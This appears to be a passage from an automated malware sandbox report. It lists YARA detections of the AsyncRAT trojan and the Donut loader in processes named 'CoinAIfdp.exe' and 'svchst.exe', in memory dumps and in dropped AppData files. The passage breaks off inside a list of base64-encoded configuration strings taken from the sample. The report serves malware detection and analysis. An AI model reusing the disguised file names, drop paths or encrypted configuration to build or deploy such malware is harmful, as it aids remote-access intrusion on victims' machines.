              Source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 6.2.CoinAIfdp.exe.6310000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 6.2.CoinAIfdp.exe.6310000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000F.00000002.1565981743.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.2587661382.0000000000767000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000006.00000002.1492148271.0000000006210000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000011.00000002.1666583354.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000010.00000002.1587574628.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.2587661382.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000011.00000002.1668370825.0000000003616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.2589796461.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 0000000D.00000002.2589796461.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: CoinAIfdp.exe PID: 8008, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: Process Memory Space: CoinAIfdp.exe PID: 8008, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: svchst.exe PID: 7348, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: Process Memory Space: svchst.exe PID: 7348, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: svchst.exe PID: 5392, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: Process Memory Space: svchst.exe PID: 5392, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: CoinAIfdp.exe PID: 7480, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: Process Memory Space: CoinAIfdp.exe PID: 7480, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: svchst.exe PID: 7800, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, cl5fowJh7yxNN2fIgNI.csCryptographic APIs: 'CreateDecryptor'
              Source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, cl5fowJh7yxNN2fIgNI.csCryptographic APIs: 'CreateDecryptor'
              Source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, cl5fowJh7yxNN2fIgNI.csCryptographic APIs: 'CreateDecryptor'
              Source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, Settings.csBase64 encoded string: 'IktYzmeBL3sqI7MbtNwmDlY5Hl5jYuvJ6mqLO5ieg6NR8Rm+Fy2K+UtvY40FJGkFur3tuDEDyY0+2irPMkSsEw==', '/e7N2vcKvkG3uYcb8CLGT7IIcNcNSPNJ854BEG6vRMABRw8TChoVkkF2Yyfa7LaG6pcKLwM4HgnDKwJLD6SdHA==', 'SZ+2mntHgU68CKySNnoNSxuhMBM+7c9KvnWVLuPmt5rHmg9RHTHW8BWoBZuUwkuCyx7Z7KWRwzzcRZ3j1Ek83g==', 'YSiYPcZO8xl1HAUFya3+djvQEXRnwtYCf/DfWtqbNQfNn1ZHqPs9XTOuv533RHNW/hXHUjXtKzr3+9VEenQj+g==', 'NL7ihy/ayhSShDQiRtDG9DQ+MkG4pr72KW4bDzBnZZh/RiVUPqaP9g/f7c52xyVqYdIar4xNoZOTAuCmUoaRu5pHSJyuafxpl49Cj15inc8=', 'stBMPaCseohw48pQ5j+jieFCpmrBd4rTK1Zvk5A+hcR1EjzVv6UNardciPj5rKcyUb4/Mg+M3Zi+FV09AhSveRMXl0FOwWjKaEbhnFIT60XI6/gG1KTQMr6yZ1QtG4LVe9V3TmczZj7fWN+E6l+Vyc6YdxDOywsTEKqOsPFoPp04HwNes7st3tf4xVlDXrn88XewCZ7LY09n4ht/GObRXgJeK2tKqck6gcn5I/kCw4pZDW4jPQ1XrPwGa4Hi+MIsfi4OrxsPF90qH/QX26+iPizLYAZD0YJDHeaqCxM9yDyMs4/PD+mL6TB3MSgDu5KLuKma+ekkz3HT+bDoa+9UxerSHCSaV6YLOqownJbP+IFURi0CH45wsA/v5fuG44/MeD7F7hwHYHUbVCX1jLUjoumXH4p02ldEL7/A0IF64dCUlm6wXbqAy4m15mg2BYIRfAYKhJlNVaf/MQ/mQW7iPIJGnDtJLFZVDnX6scsLLX2hQXD9AXZuAyF2dws8BkWtTch+YPBkrsaR+OwJzmEGk4FrSMWIZJHAJak4BwGtnwBEzgHeI5R2jQCBhqcF1+ezuNmNmyMiStDD6XW0BOctfbXLo9yQaTIEP74LpzZVZt5gbgoneu7zykSzNrwfSG3NBaoxBAdM1z3UTEBAxaHXHat0wxfL3yqfrjlAWPMfWG0XUOS00xpJPHDhRZYoXa+mH8lUe9FMqFNZzWkwN9ERt5RnBVyoz8Z0d+8Vc0uZoaZ5xdX94ColF0MlIubPRCuvDcAjh6aHb6XzdsYzd8nGgxcOjkdJ0HC/4sN8N9ewcyMeZ4UYXy/8WpbNdYvYPjBMmw73KrtqNmMgXx/Q+W51pkOJnsBCzkqB/JsoTLIO8kkVNXa5h8yc1gCgG/0O6nyMI7pWHxzAkux1tDFNAawVscfIWlj5unqAcGS2XP/yWiGOdJGMxd+A37mJ+kfuQDOzZvnNr8PG3gOGA7EqovErZg==', 'XlJmXPQTjwboANulS9LnwIILBKq/C35BTm8KIAMb8foem7G2GugOGhd3LaKvT4x0FLgzAdHtYEmqWyNHyTJscQ==', 'xgc/DrNayvH+qStYwh5PdHcrFAKMePynDoZI0y1/d9HprMWNE7Dp3Al5+nwN5tcxMmJ1Ywomr6dq+A5l4AZ+NQ==', 'Y7t3wwf932TvdvOqbSa66BoOxuApNMvFkfUnK6B9qryvqz1qRD0TujKRdcA4lL57EUeB63fXrGQvXvnWj2qJFg=='
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, Settings.csBase64 encoded string: 'IktYzmeBL3sqI7MbtNwmDlY5Hl5jYuvJ6mqLO5ieg6NR8Rm+Fy2K+UtvY40FJGkFur3tuDEDyY0+2irPMkSsEw==', '/e7N2vcKvkG3uYcb8CLGT7IIcNcNSPNJ854BEG6vRMABRw8TChoVkkF2Yyfa7LaG6pcKLwM4HgnDKwJLD6SdHA==', 'SZ+2mntHgU68CKySNnoNSxuhMBM+7c9KvnWVLuPmt5rHmg9RHTHW8BWoBZuUwkuCyx7Z7KWRwzzcRZ3j1Ek83g==', 'YSiYPcZO8xl1HAUFya3+djvQEXRnwtYCf/DfWtqbNQfNn1ZHqPs9XTOuv533RHNW/hXHUjXtKzr3+9VEenQj+g==', 'NL7ihy/ayhSShDQiRtDG9DQ+MkG4pr72KW4bDzBnZZh/RiVUPqaP9g/f7c52xyVqYdIar4xNoZOTAuCmUoaRu5pHSJyuafxpl49Cj15inc8=', 